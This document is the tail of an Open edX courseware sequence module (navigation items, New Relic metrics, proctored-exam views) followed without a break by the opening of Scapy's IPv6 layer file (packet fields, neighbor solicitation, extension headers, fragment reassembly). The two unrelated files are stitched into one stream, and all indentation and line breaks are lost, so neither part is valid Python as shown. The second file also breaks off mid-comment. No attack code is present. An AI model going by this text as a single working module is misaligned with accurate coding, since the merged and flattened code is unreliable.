'contains_content_type_gated_content': contains_content_type_gated_content, } if not render_items: # The item url format can be defined in the template context like so: # context['item_url'] = '/my/item/path/{usage_key}/whatever' iteminfo['href'] = context.get('item_url', '').format(usage_key=usage_id) if is_user_authenticated: if item.location.block_type == 'vertical' and completion_service: iteminfo['complete'] = completion_service.vertical_is_complete(item) contents.append(iteminfo) return contents def _locations_in_subtree(self, node): """ The usage keys for all descendants of an XBlock/XModule as a flat list. Includes the location of the node passed in. """ stack = [node] locations = [] while stack: curr = stack.pop() locations.append(curr.location) if curr.has_children: stack.extend(curr.get_children()) return locations def _capture_basic_metrics(self): """ Capture basic information about this sequence in New Relic. """ if not newrelic: return newrelic.agent.add_custom_parameter('seq.block_id', six.text_type(self.location)) newrelic.agent.add_custom_parameter('seq.display_name', self.display_name or '') newrelic.agent.add_custom_parameter('seq.position', self.position) newrelic.agent.add_custom_parameter('seq.is_time_limited', self.is_time_limited) def _capture_full_seq_item_metrics(self, display_items): """ Capture information about the number and types of XBlock content in the sequence as a whole. We send this information to New Relic so that we can do better performance analysis of courseware. """ if not newrelic: return # Basic count of the number of Units (a.k.a. VerticalBlocks) we have in # this learning sequence newrelic.agent.add_custom_parameter('seq.num_units', len(display_items)) # Count of all modules (leaf nodes) in this sequence (e.g. videos, # problems, etc.) The units (verticals) themselves are not counted. all_item_keys = self._locations_in_subtree(self) newrelic.agent.add_custom_parameter('seq.num_items', len(all_item_keys)) # Count of all modules by block_type (e.g. "video": 2, "discussion": 4) block_counts = collections.Counter(usage_key.block_type for usage_key in all_item_keys) for block_type, count in block_counts.items(): newrelic.agent.add_custom_parameter('seq.block_counts.{}'.format(block_type), count) def _capture_current_unit_metrics(self, display_items): """ Capture information about the current selected Unit within the Sequence. """ if not newrelic: return # Positions are stored with indexing starting at 1. If we get into a # weird state where the saved position is out of bounds (e.g. the # content was changed), avoid going into any details about this unit. if 1 <= self.position <= len(display_items): # Basic info about the Unit... current = display_items[self.position - 1] newrelic.agent.add_custom_parameter('seq.current.block_id', six.text_type(current.location)) newrelic.agent.add_custom_parameter('seq.current.display_name', current.display_name or '') # Examining all items inside the Unit (or split_test, conditional, etc.) child_locs = self._locations_in_subtree(current) newrelic.agent.add_custom_parameter('seq.current.num_items', len(child_locs)) curr_block_counts = collections.Counter(usage_key.block_type for usage_key in child_locs) for block_type, count in curr_block_counts.items(): newrelic.agent.add_custom_parameter('seq.current.block_counts.{}'.format(block_type), count) def _time_limited_student_view(self): """ Delegated rendering of a student view when in a time limited view. This ultimately calls down into edx_proctoring pip installed djangoapp """ # None = no overridden view rendering view_html = None proctoring_service = self.runtime.service(self, 'proctoring') credit_service = self.runtime.service(self, 'credit') verification_service = self.runtime.service(self, 'verification') # Is this sequence designated as a Timed Examination, which includes # Proctored Exams feature_enabled = ( proctoring_service and credit_service and self.is_time_limited ) if feature_enabled: user_id = self.runtime.user_id user_role_in_course = 'staff' if self.runtime.user_is_staff else 'student' course_id = self.runtime.course_id content_id = self.location context = { 'display_name': self.display_name, 'default_time_limit_mins': ( self.default_time_limit_minutes if self.default_time_limit_minutes else 0 ), 'is_practice_exam': self.is_practice_exam, 'allow_proctoring_opt_out': self.allow_proctoring_opt_out, 'due_date': self.due, 'grace_period': self.graceperiod, # lint-amnesty, pylint: disable=no-member 'experimental_proctoring_features': COURSEWARE_PROCTORING_IMPROVEMENTS.is_enabled(course_id), } # inject the user's credit requirements and fulfillments if credit_service: credit_state = credit_service.get_credit_state(user_id, course_id) if credit_state: context.update({ 'credit_state': credit_state }) # inject verification status if verification_service: verification_status = verification_service.get_status(user_id) context.update({ 'verification_status': verification_status['status'], 'reverify_url': verification_service.reverify_url(), }) # See if the edx-proctoring subsystem wants to present # a special view to the student rather # than the actual sequence content # # This will return None if there is no # overridden view to display given the # current state of the user view_html = proctoring_service.get_student_view( user_id=user_id, course_id=course_id, content_id=content_id, context=context, user_role=user_role_in_course ) return view_html def get_icon_class(self): child_classes = set(child.get_icon_class() for child in self.get_children()) new_class = 'other' for c in class_priority: if c in child_classes: new_class = c return new_class class SequenceMixin(SequenceFields): """ A mixin of shared code between the SequenceDescriptor and XBlocks converted from XModules which inherited from SequenceDescriptor. """ @classmethod def definition_from_xml(cls, xml_object, system): # lint-amnesty, pylint: disable=missing-function-docstring children = [] for child in xml_object: try: child_block = system.process_xml(etree.tostring(child, encoding='unicode')) children.append(child_block.scope_ids.usage_id) except Exception as e: # lint-amnesty, pylint: disable=broad-except log.exception("Unable to load child when parsing Sequence. Continuing...") if system.error_tracker is not None: system.error_tracker(u"ERROR: {0}".format(e)) continue return {}, children def index_dictionary(self): """ Return dictionary prepared with module content and type for indexing. """ # return key/value fields in a Python dict object # values may be numeric / string or dict # default implementation is an empty dict xblock_body = super(SequenceMixin, self).index_dictionary() # lint-amnesty, pylint: disable=super-with-arguments html_body = { "display_name": self.display_name, } if "content" in xblock_body: xblock_body["content"].update(html_body) else: xblock_body["content"] = html_body xblock_body["content_type"] = "Sequence" return xblock_body class SequenceDescriptor(SequenceMixin, ProctoringFields, MakoModuleDescriptor, XmlDescriptor): """ A Sequence's Descriptor object """ mako_template = 'widgets/sequence-edit.html' module_class = SequenceModule resources_dir = None has_author_view = True show_in_read_only_mode = True js = { 'js': [resource_string(__name__, 'js/src/sequence/edit.js')], } js_module_name = "SequenceDescriptor" def definition_to_xml(self, resource_fs): xml_object = etree.Element('sequential') for child in self.get_children(): self.runtime.add_block_as_child_node(child, xml_object) return xml_object @property def non_editable_metadata_fields(self): """ `is_entrance_exam` should not be editable in the Studio settings editor. """ non_editable_fields = super(SequenceDescriptor, self).non_editable_metadata_fields # lint-amnesty, pylint: disable=super-with-arguments non_editable_fields.append(self.fields['is_entrance_exam']) # pylint:disable=unsubscriptable-object return non_editable_fields class HighlightsFields(object): """Only Sections have summaries now, but we may expand that later.""" highlights = List( help=_("A list summarizing what students should look forward to in this section."), scope=Scope.settings ) class SectionModule(HighlightsFields, SequenceModule): """Module for a Section/Chapter.""" class SectionDescriptor(HighlightsFields, SequenceDescriptor): """Descriptor for a Section/Chapter.""" module_class = SectionModule
#! /usr/bin/env python ############################################################################# ## ## ## inet6.py --- IPv6 support for Scapy ## ## see http://natisbad.org/IPv6/ ## ## for more informations ## ## ## ## Copyright (C) 2005 Guillaume Valadon <[email protected]> ## ## Arnaud Ebalard <[email protected]> ## ## ## ## This program is free software; you can redistribute it and/or modify it ## ## under the terms of the GNU General Public License version 2 as ## ## published by the Free Software Foundation. ## ## ## ## This program is distributed in the hope that it will be useful, but ## ## WITHOUT ANY WARRANTY; without even the implied warranty of ## ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## ## General Public License for more details. ## ## ## ############################################################################# """ IPv6 (Internet Protocol v6). """ import socket if not socket.has_ipv6: raise socket.error("can't use AF_INET6, IPv6 is disabled") if not hasattr(socket, "IPPROTO_IPV6"): # Workaround for http://bugs.python.org/issue6926 socket.IPPROTO_IPV6 = 41 if not hasattr(socket, "IPPROTO_IPIP"): # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 socket.IPPROTO_IPIP = 4 from scapy.config import conf from scapy.layers.l2 import * from scapy.layers.inet import * from scapy.fields import * from scapy.packet import * from scapy.volatile import * from scapy.sendrecv import sr,sr1,srp1 from scapy.as_resolvers import AS_resolver_riswhois from scapy.supersocket import SuperSocket,L3RawSocket from scapy.arch import * from scapy.utils6 import * ############################################################################# # Helpers ## ############################################################################# def get_cls(name, fallback_cls): return globals().get(name, fallback_cls) ########################## ## Neighbor cache stuff ## ########################## conf.netcache.new_cache("in6_neighbor", 120) def neighsol(addr, src, iface, timeout=1, chainCC=0): """ Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address addr. 'src' address is used as source of the message. Message is sent on iface. By default, timeout waiting for an answer is 1 second. If no answer is gathered, None is returned. Else, the answer is returned (ethernet frame). """ nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) d = inet_ntop(socket.AF_INET6, nsma) dm = in6_getnsmac(nsma) p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255) p /= ICMPv6ND_NS(tgt=addr) p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, chainCC=chainCC) return res def getmacbyip6(ip6, chainCC=0): """ Returns the mac address to be used for provided 'ip6' peer. neighborCache.get() method is used on instantiated neighbor cache. Resolution mechanism is described in associated doc string. (chainCC parameter value ends up being passed to sending function used to perform the resolution, if needed) """ if in6_ismaddr(ip6): # Multicast mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) return mac iff,a,nh = conf.route6.route(ip6, dev=conf.iface6) if iff == LOOPBACK_NAME: return "ff:ff:ff:ff:ff:ff" if nh != '::': ip6 = nh # Found next hop mac = conf.netcache.in6_neighbor.get(ip6) if mac: return mac res = neighsol(ip6, a, iff, chainCC=chainCC) if res is not None: if ICMPv6NDOptDstLLAddr in res: mac = res[ICMPv6NDOptDstLLAddr].lladdr else: mac = res.src conf.netcache.in6_neighbor[ip6] = mac return mac return None ############################################################################# ############################################################################# ### IPv6 addresses manipulation routines ### ############################################################################# ############################################################################# class Net6(Gen): # syntax ex. fec0::/126 """Generate a list of IPv6s from a network address or a name""" name = "ipv6" ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$") def __init__(self, net): self.repr = net tmp = net.split('/')+["128"] if not self.ipaddress.match(net): tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0] netmask = int(tmp[1]) self.net = inet_pton(socket.AF_INET6, tmp[0]) self.mask = in6_cidr2mask(netmask) self.plen = netmask def __iter__(self): def m8(i): if i % 8 == 0: return i tuple = filter(lambda x: m8(x), xrange(8, 129)) a = in6_and(self.net, self.mask) tmp = map(lambda x: x, struct.unpack('16B', a)) def parse_digit(a, netmask): netmask = min(8,max(netmask,0)) a = (int(a) & (0xffL<<netmask),(int(a) | (0xffL>>(8-netmask)))+1) return a self.parsed = map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple)) def rec(n, l): if n and n % 2 == 0: sep = ':' else: sep = '' if n == 16: return l else: ll = [] for i in xrange(*self.parsed[n]): for y in l: ll += [y+sep+'%.2x'%i] return rec(n+1, ll) return iter(rec(0, [''])) def __repr__(self): return "Net6(%r)" % self.repr ############################################################################# ############################################################################# ### IPv6 Class ### ############################################################################# ############################################################################# class IP6Field(Field): def __init__(self, name, default): Field.__init__(self, name, default, "16s") def h2i(self, pkt, x): if type(x) is str: try: x = in6_ptop(x) except socket.error: x = Net6(x) elif type(x) is list: x = map(Net6, x) return x def i2m(self, pkt, x): return inet_pton(socket.AF_INET6, x) def m2i(self, pkt, x): return inet_ntop(socket.AF_INET6, x) def any2i(self, pkt, x): return self.h2i(pkt,x) def i2repr(self, pkt, x): if x is None: return self.i2h(pkt,x) elif not isinstance(x, Net6) and not type(x) is list: if in6_isaddrTeredo(x): # print Teredo info server, flag, maddr, mport = teredoAddrExtractInfo(x) return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport) elif in6_isaddr6to4(x): # print encapsulated address vaddr = in6_6to4ExtractAddr(x) return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr) return self.i2h(pkt, x) # No specific information to return def randval(self): return RandIP6() class SourceIP6Field(IP6Field): __slots__ = ["dstname"] def __init__(self, name, dstname): IP6Field.__init__(self, name, None) self.dstname = dstname def i2m(self, pkt, x): if x is None: dst=getattr(pkt,self.dstname) iff,x,nh = conf.route6.route(dst) return IP6Field.i2m(self, pkt, x) def i2h(self, pkt, x): if x is None: dst=getattr(pkt,self.dstname) if isinstance(dst,Gen): r = map(conf.route6.route, dst) r.sort() if r[0] == r[-1]: x=r[0][1] else: warning("More than one possible route for %s"%repr(dst)) return None else: iff,x,nh = conf.route6.route(dst) return IP6Field.i2h(self, pkt, x) class DestIP6Field(IP6Field, DestField): bindings = {} def __init__(self, name, default): IP6Field.__init__(self, name, None) DestField.__init__(self, name, default) def i2m(self, pkt, x): if x is None: x = self.dst_from_pkt(pkt) return IP6Field.i2m(self, pkt, x) def i2h(self, pkt, x): if x is None: x = self.dst_from_pkt(pkt) return IP6Field.i2h(self, pkt, x) ipv6nh = { 0:"Hop-by-Hop Option Header", 4:"IP", 6:"TCP", 17:"UDP", 41:"IPv6", 43:"Routing Header", 44:"Fragment Header", 47:"GRE", 50:"ESP Header", 51:"AH Header", 58:"ICMPv6", 59:"No Next Header", 60:"Destination Option Header", 132:"SCTP", 135:"Mobility Header"} ipv6nhcls = { 0: "IPv6ExtHdrHopByHop", 4: "IP", 6: "TCP", 17: "UDP", 43: "IPv6ExtHdrRouting", 44: "IPv6ExtHdrFragment", #50: "IPv6ExtHrESP", #51: "IPv6ExtHdrAH", 58: "ICMPv6Unknown", 59: "Raw", 60: "IPv6ExtHdrDestOpt" } class IP6ListField(StrField): __slots__ = ["count_from", "length_from"] islist = 1 def __init__(self, name, default, count_from=None, length_from=None): if default is None: default = [] StrField.__init__(self, name, default) self.count_from = count_from self.length_from = length_from def i2len(self, pkt, i): return 16*len(i) def i2count(self, pkt, i): if type(i) is list: return len(i) return 0 def getfield(self, pkt, s): c = l = None if self.length_from is not None: l = self.length_from(pkt) elif self.count_from is not None: c = self.count_from(pkt) lst = [] ret = "" remain = s if l is not None: remain,ret = s[:l],s[l:] while remain: if c is not None: if c <= 0: break c -= 1 addr = inet_ntop(socket.AF_INET6, remain[:16]) lst.append(addr) remain = remain[16:] return remain+ret,lst def i2m(self, pkt, x): s = '' for y in x: try: y = inet_pton(socket.AF_INET6, y) except: y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] y = inet_pton(socket.AF_INET6, y) s += y return s def i2repr(self,pkt,x): s = [] if x == None: return "[]" for y in x: s.append('%s' % y) return "[ %s ]" % (", ".join(s)) class _IPv6GuessPayload: name = "Dummy class that implements guess_payload_class() for IPv6" def default_payload_class(self,p): if self.nh == 58: # ICMPv6 t = ord(p[0]) if len(p) > 2 and t == 139 or t == 140: # Node Info Query return _niquery_guesser(p) if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages return get_cls(icmp6typescls.get(t,"Raw"), "Raw") return Raw elif self.nh == 135 and len(p) > 3: # Mobile IPv6 return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic) else: return get_cls(ipv6nhcls.get(self.nh,"Raw"), "Raw") class IPv6(_IPv6GuessPayload, Packet, IPTools): name = "IPv6" fields_desc = [ BitField("version" , 6 , 4), BitField("tc", 0, 8), #TODO: IPv6, ByteField ? BitField("fl", 0, 20), ShortField("plen", None), ByteEnumField("nh", 59, ipv6nh), ByteField("hlim", 64), SourceIP6Field("src", "dst"), # dst is for src @ selection DestIP6Field("dst", "::1") ] def route(self): dst = self.dst if isinstance(dst,Gen): dst = iter(dst).next() return conf.route6.route(dst) def mysummary(self): return "%s > %s (%i)" % (self.src,self.dst, self.nh) def post_build(self, p, pay): p += pay if self.plen is None: l = len(p) - 40 p = p[:4]+struct.pack("!H", l)+p[6:] return p def extract_padding(self, s): l = self.plen return s[:l], s[l:] def hashret(self): if self.nh == 58 and isinstance(self.payload, _ICMPv6): if self.payload.type < 128: return self.payload.payload.hashret() elif (self.payload.type in [133,134,135,136,144,145]): return struct.pack("B", self.nh)+self.payload.hashret() nh = self.nh sd = self.dst ss = self.src if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): # With routing header, the destination is the last # address of the IPv6 list if segleft > 0 nh = self.payload.nh try: sd = self.addresses[-1] except IndexError: sd = '::1' # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # could be anything from the original list ... if 1: sd = inet_pton(socket.AF_INET6, sd) for a in self.addresses: a = inet_pton(socket.AF_INET6, a) sd = strxor(sd, a) sd = inet_ntop(socket.AF_INET6, sd) if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): nh = self.payload.nh if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): nh = self.payload.nh if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): foundhao = None for o in self.payload.options: if isinstance(o, HAO): foundhao = o if foundhao: nh = self.payload.nh # XXX what if another extension follows ? ss = foundhao.hoa if conf.checkIPsrc and conf.checkIPaddr: sd = inet_pton(socket.AF_INET6, sd) ss = inet_pton(socket.AF_INET6, self.src) return struct.pack("B",nh)+self.payload.hashret() else: return struct.pack("B", nh)+self.payload.hashret() def answers(self, other): if not isinstance(other, IPv6): # self is reply, other is request return False if conf.checkIPaddr: ss = inet_pton(socket.AF_INET6, self.src) sd = inet_pton(socket.AF_INET6, self.dst) os = inet_pton(socket.AF_INET6, other.src) od = inet_pton(socket.AF_INET6, other.dst) # request was sent to a multicast address (other.dst) # Check reply destination addr matches request source addr (i.e # sd == os) except when reply is multicasted too # XXX test mcast scope matching ? if in6_ismaddr(other.dst): if in6_ismaddr(self.dst): if ((od == sd) or (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): return self.payload.answers(other.payload) return False if (os == sd): return self.payload.answers(other.payload) return False elif (sd != os): # or ss != od): <- removed for ICMP errors return False if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # ICMPv6 Error message -> generated by IPv6 packet # Note : at the moment, we jump the ICMPv6 specific class # to call answers() method of erroneous packet (over # initial packet). There can be cases where an ICMPv6 error # class could implement a specific answers method that perform # a specific task. Currently, don't see any use ... return self.payload.payload.answers(other) elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): return self.payload.answers(other.payload.payload) elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): return self.payload.answers(other.payload.payload) elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): return self.payload.payload.answers(other.payload.payload) elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance return self.payload.payload.answers(other.payload) else: if (self.nh != other.nh): return False return self.payload.answers(other.payload) conf.neighbor.register_l3(Ether, IPv6, lambda l2,l3: getmacbyip6(l3.dst)) class IPerror6(IPv6): name = "IPv6 in ICMPv6" def answers(self, other): if not isinstance(other, IPv6): return False sd = inet_pton(socket.AF_INET6, self.dst) ss = inet_pton(socket.AF_INET6, self.src) od = inet_pton(socket.AF_INET6, other.dst) os = inet_pton(socket.AF_INET6, other.src) # Make sure that the ICMPv6 error is related to the packet scapy sent if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: # find upper layer for self (possible citation) selfup = self.payload while selfup is not None and isinstance(selfup, _IPv6ExtHdr): selfup = selfup.payload # find upper layer for other (initial packet). Also look for RH otherup = other.payload request_has_rh = False while otherup is not None and isinstance(otherup, _IPv6ExtHdr): if isinstance(otherup, IPv6ExtHdrRouting): request_has_rh = True otherup = otherup.payload if ((ss == os and sd == od) or # <- Basic case (ss == os and request_has_rh)): # <- Request has a RH : # don't check dst address # Let's deal with possible MSS Clamping if (isinstance(selfup, TCP) and isinstance(otherup, TCP) and selfup.options != otherup.options): # seems clamped # Save fields modified by MSS clamping old_otherup_opts = otherup.options old_otherup_cksum = otherup.chksum old_otherup_dataofs = otherup.dataofs old_selfup_opts = selfup.options old_selfup_cksum = selfup.chksum old_selfup_dataofs = selfup.dataofs # Nullify them otherup.options = [] otherup.chksum = 0 otherup.dataofs = 0 selfup.options = [] selfup.chksum = 0 selfup.dataofs = 0 # Test it and save result s1 = str(selfup) s2 = str(otherup) l = min(len(s1), len(s2)) res = s1[:l] == s2[:l] # recall saved values otherup.options = old_otherup_opts otherup.chksum = old_otherup_cksum otherup.dataofs = old_otherup_dataofs selfup.options = old_selfup_opts selfup.chksum = old_selfup_cksum selfup.dataofs = old_selfup_dataofs return res s1 = str(selfup) s2 = str(otherup) l = min(len(s1), len(s2)) return s1[:l] == s2[:l] return False def mysummary(self): return Packet.mysummary(self) ############################################################################# ############################################################################# ### Upper Layer Checksum computation ### ############################################################################# ############################################################################# class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation name = "Pseudo IPv6 Header" fields_desc = [ IP6Field("src", "::"), IP6Field("dst", "::"), ShortField("uplen", None), BitField("zero", 0, 24), ByteField("nh", 0) ] def in6_chksum(nh, u, p): """ Performs IPv6 Upper Layer checksum computation. Provided parameters are: - 'nh' : value of upper layer protocol - 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be provided with all under layers (IPv6 and all extension headers, for example) - 'p' : the payload of the upper layer provided as a string Functions operate by filling a pseudo header class instance (PseudoIPv6) with - Next Header value - the address of _final_ destination (if some Routing Header with non segleft field is present in underlayer classes, last address is used.) - the address of _real_ source (basically the source address of an IPv6 class instance available in the underlayer or the source address in HAO option if some Destination Option header found in underlayer includes this option). - the length is the length of provided payload string ('p') """ ph6 = PseudoIPv6() ph6.nh = nh rthdr = 0 hahdr = 0 final_dest_addr_found = 0 while u != None and not isinstance(u, IPv6): if (isinstance(u, IPv6ExtHdrRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[-1] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and isinstance(u.options[0], HAO)): hahdr = u.options[0].hoa u = u.underlayer if u is None: warning("No IPv6 underlayer to compute checksum. Leaving null.") return 0 if hahdr: ph6.src = hahdr else: ph6.src = u.src if rthdr: ph6.dst = rthdr else: ph6.dst = u.dst ph6.uplen = len(p) ph6s = str(ph6) return checksum(ph6s+p) ############################################################################# ############################################################################# ### Extension Headers ### ############################################################################# ############################################################################# # Inherited by all extension header classes class _IPv6ExtHdr(_IPv6GuessPayload, Packet): name = 'Abstract IPV6 Option Header' aliastypes = [IPv6, IPerror6] # TODO ... #################### IPv6 options for Extension Headers ##################### _hbhopts = { 0x00: "Pad1", 0x01: "PadN", 0x04: "Tunnel Encapsulation Limit", 0x05: "Router Alert", 0x06: "Quick-Start", 0xc2: "Jumbo Payload", 0xc9: "Home Address Option" } class _OTypeField(ByteEnumField): """ Modified BytEnumField that displays information regarding the IPv6 option based on its option type value (What should be done by nodes that process the option if they do not understand it ...) It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options """ pol = {0x00: "00: skip", 0x40: "01: discard", 0x80: "10: discard+ICMP", 0xC0: "11: discard+ICMP not mcast"} enroutechange = {0x00: "0: Don't change en-route", 0x20: "1: May change en-route" } def i2repr(self, pkt, x): s = self.i2s.get(x, repr(x)) polstr = self.pol[(x & 0xC0)] enroutechangestr = self.enroutechange[(x & 0x20)] return "%s [%s, %s]" % (s, polstr, enroutechangestr) class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option name = "Scapy6 Unknown Option" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from = lambda pkt: pkt.optlen) ] def alignment_delta(self, curpos): # By default, no alignment requirement """ As specified in section 4.2 of RFC 2460, every options has an alignment requirement ususally expressed xn+y, meaning the Option Type must appear at an integer multiple of x octest from the start of the header, plus y octet. That function is provided the current position from the start of the header and returns required padding length. """ return 0 class Pad1(Packet): # IPv6 Hop-By-Hop Option name = "Pad1" fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ] def alignment_delta(self, curpos): # No alignment requirement return 0 class PadN(Packet): # IPv6 Hop-By-Hop Option name = "PadN" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from = lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # No alignment requirement return 0 class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option name = "Router Alert" fields_desc = [_OTypeField("otype", 0x05, _hbhopts), ByteField("optlen", 2), ShortEnumField("value", None, { 0: "Datagram contains a MLD message", 1: "Datagram contains RSVP message", 2: "Datagram contains an Active Network message", 68: "NSIS NATFW NSLP", 69: "MPLS OAM", 65535: "Reserved" })] # TODO : Check IANA has not defined new values for value field of RouterAlertOption # TODO : Now that we have that option, we should do something in MLD class that need it # TODO : IANA has defined ranges of values which can't be easily represented here. # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml def alignment_delta(self, curpos): # alignment requirement : 2n+0 x = 2 ; y = 0 delta = x*((curpos - y + x - 1)/x) + y - curpos return delta class Jumbo(Packet): # IPv6 Hop-By-Hop Option name = "Jumbo Payload" fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), ByteField("optlen", 4), IntField("jumboplen", None) ] def alignment_delta(self, curpos): # alignment requirement : 4n+2 x = 4 ; y = 2 delta = x*((curpos - y + x - 1)/x) + y - curpos return delta class HAO(Packet): # IPv6 Destination Options Header Option name = "Home Address Option" fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), ByteField("optlen", 16), IP6Field("hoa", "::") ] def alignment_delta(self, curpos): # alignment requirement : 8n+6 x = 8 ; y = 6 delta = x*((curpos - y + x - 1)/x) + y - curpos return delta _hbhoptcls = { 0x00: Pad1, 0x01: PadN, 0x05: RouterAlert, 0xC2: Jumbo, 0xC9: HAO } ######################## Hop-by-Hop Extension Header ######################## class _HopByHopOptionsField(PacketListField): __slots__ = ["curpos"] def __init__(self, name, default, cls, curpos, count_from=None, length_from=None): self.curpos = curpos PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from) def i2len(self, pkt, i): l = len(self.i2m(pkt, i)) return l def i2count(self, pkt, i): if type(i) is list: return len(i) return 0 def getfield(self, pkt, s): c = l = None if self.length_from is not None: l = self.length_from(pkt) elif self.count_from is not None: c = self.count_from(pkt) opt = [] ret = "" x = s if l is not None: x,ret = s[:l],s[l:] while x: if c is not None: if c <= 0: break c -= 1 o = ord(x[0]) # Option type cls = self.cls if _hbhoptcls.has_key(o): cls = _hbhoptcls[o] try: op = cls(x) except: op = self.cls(x) opt.append(op) if isinstance(op.payload, conf.raw_layer): x = op.payload.load del(op.payload) else: x = "" return x+ret,opt def i2m(self, pkt, x): autopad = None try: autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field except: autopad = 1 if not autopad: return "".join(map(str, x)) curpos = self.curpos s = "" for p in x: d = p.alignment_delta(curpos) curpos += d if d == 1: s += str(Pad1()) elif d != 0: s += str(PadN(optdata='\x00'*(d-2))) pstr = str(p) curpos += len(pstr) s += pstr # Let's make the class including our option field # a multiple of 8 octets long d = curpos % 8 if d == 0: return s d = 8 - d if d == 1: s += str(Pad1()) elif d != 0: s += str(PadN(optdata='\x00'*(d-2))) return s def addfield(self, pkt, s, val): return s+self.i2m(pkt, val) class _PhantomAutoPadField(ByteField): def addfield(self, pkt, s, val): return s def getfield(self, pkt, s): return s, 1 def i2repr(self, pkt, x): if x: return "On" return "Off" class IPv6ExtHdrHopByHop(_IPv6ExtHdr): name = "IPv6 Extension Header - Hop-by-Hop Options Header" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust = lambda pkt,x: (x+2+7)/8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default _HopByHopOptionsField("options", [], HBHOptUnknown, 2, length_from = lambda pkt: (8*(pkt.len+1))-2) ] overload_fields = {IPv6: { "nh": 0 }} ######################## Destination Option Header ########################## class IPv6ExtHdrDestOpt(_IPv6ExtHdr): name = "IPv6 Extension Header - Destination Options Header" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust = lambda pkt,x: (x+2+7)/8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default _HopByHopOptionsField("options", [], HBHOptUnknown, 2, length_from = lambda pkt: (8*(pkt.len+1))-2) ] overload_fields = {IPv6: { "nh": 60 }} ############################# Routing Header ################################ class IPv6ExtHdrRouting(_IPv6ExtHdr): name = "IPv6 Option Header Routing" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, count_of="addresses", fmt="B", adjust = lambda pkt,x:2*x), # in 8 bytes blocks ByteField("type", 0), ByteField("segleft", None), BitField("reserved", 0, 32), # There is meaning in this field ... IP6ListField("addresses", [], length_from = lambda pkt: 8*pkt.len)] overload_fields = {IPv6: { "nh": 43 }} def post_build(self, pkt, pay): if self.segleft is None: pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:] return _IPv6ExtHdr.post_build(self, pkt, pay) ########################### Fragmentation Header ############################ class IPv6ExtHdrFragment(_IPv6ExtHdr): name = "IPv6 Extension Header - Fragmentation header" fields_desc = [ ByteEnumField("nh", 59, ipv6nh), BitField("res1", 0, 8), BitField("offset", 0, 13), BitField("res2", 0, 2), BitField("m", 0, 1), IntField("id", None) ] overload_fields = {IPv6: { "nh": 44 }} def defragment6(pktlist): """ Performs defragmentation of a list of IPv6 packets. Packets are reordered. Crap is dropped. What lacks is completed by 'X' characters. """ l = filter(lambda x: IPv6ExtHdrFragment in x, pktlist) # remove non fragments if not l: return [] id = l[0][IPv6ExtHdrFragment].id llen = len(l) l = filter(lambda x: x[IPv6ExtHdrFragment].id == id, l) if len(l) != llen: warning("defragment6: some fragmented packets have been removed from list") llen = len(l) # reorder fragments i = 0 res = [] while l: min_pos = 0 min_offset = l[0][IPv6ExtHdrFragment].offset for p in l: cur_offset = p[IPv6ExtHdrFragment].offset if cur_offset < min_offset: min_pos = 0 min_offset = cur_offset res.append(l[min_pos]) del(l[min_pos]) # regenerate the 